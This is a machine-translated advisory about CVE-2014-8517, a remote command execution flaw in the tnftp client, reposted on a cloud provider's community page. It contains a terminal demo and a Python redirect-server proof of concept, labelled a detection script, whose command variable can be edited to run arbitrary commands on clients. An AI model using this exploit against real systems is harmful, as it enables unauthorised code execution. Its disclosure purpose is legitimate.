Vulnerability warning: FTP exposes a severe remote execution vulnerability, affecting multiple versions of Linux (with a detection script)

Source: Internet
Author: User
Tags ftp client

Vulnerability warning: FTP exposes a severe remote execution vulnerability, affecting multiple versions of Linux (with a detection script)

On July 6, October 28, a public email showed the FTP remote command execution vulnerability. The vulnerability affected Linux systems include: Fedora, Debian, NetBSD, FreeBSD, OpenBSD, it even affected the latest version of ios OS X, Yosemite 10.10.

A NetBSD developer (Jared McNeill) confirms that the vulnerability has allowed WEB servers to remotely execute malicious commands through tnftp and that the vulnerability has been numbered as a CVE-2014-8517:



a20$ pwd    /var/www/cgi-bin a20$ ls -l    total 4      -rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect    -rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a a20$ cat redirect    #!/bin/sh      echo 'Status: 302 Found'      echo 'Content-Type: text/html'      echo 'Connection: keep-alive'      echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'      echo a20$a20$ ftp http://localhost/cgi-bin/redirect  Trying ::1:80 ...    ftp: Can't connect to `::1:80': Connection refused  Trying 127.0.0.1:80 ...    Requesting http://localhost/cgi-bin/redirect  Redirected to http://192.168.2.19/cgi-bin/|uname%20-a  Requesting http://192.168.2.19/cgi-bin/|uname%20-a      32      101.46 KiB/s  32 bytes retrieved in 00:00 (78.51 KiB/s)    NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36    ADT 2014    Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIE  BOARD evbarm a20$

 

Vulnerability impact scope and announcement

System developers such as Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD, and Apple are aware of the hazards caused by this vulnerability. Among them, Debian, Red Hat, gnetoo and Novell have issued a vulnerability announcement:

Vulnerability Detection script(Do not use it for illegal purposes)
 

#!/usr/bin/env python """ Sample OSX/BSD FTP client exploit. Written because ISO policies were doing my head in. To exploit, edit the value of the cmd variable, then run the script. To test:       ftp http://<myserver>/foo   And you should see the command executed.   All wrongs reversed - @stevelord """ import BaseHTTPServer import sys import socket import urllib   hostname = socket.getfqdn() # Set this to your IP if you have no FQDN port = 8000 # Set this to the port you want to run this on cmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying." cmd = urllib.quote(cmd) redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmd  class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler): def do_GET(s): if cmd in s.path: s.send_response(200) s.end_headers() else: s.send_response(302) s.send_header("Location", redir) s.end_headers() if __name__ == "__main__": print "redirecting to,", redir     server_class = BaseHTTPServer.HTTPServer httpd = server_class((hostname, port), RedirectHandler) try: httpd.serve_forever() print "Started serving." except KeyboardInterrupt: pass httpd.server_close() print "\nStopped serving." 

 

 

For more information about the solution, see:

Http://seclists.org/oss-sec/2014/q4/459 http://seclists.org/oss-sec/2014/q4/464

Http://seclists.org/oss-sec/2014/q4/460

[Reference Information Source: nix-systems-affected-ftp-remote-command-execution-vulnerability]

 


Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.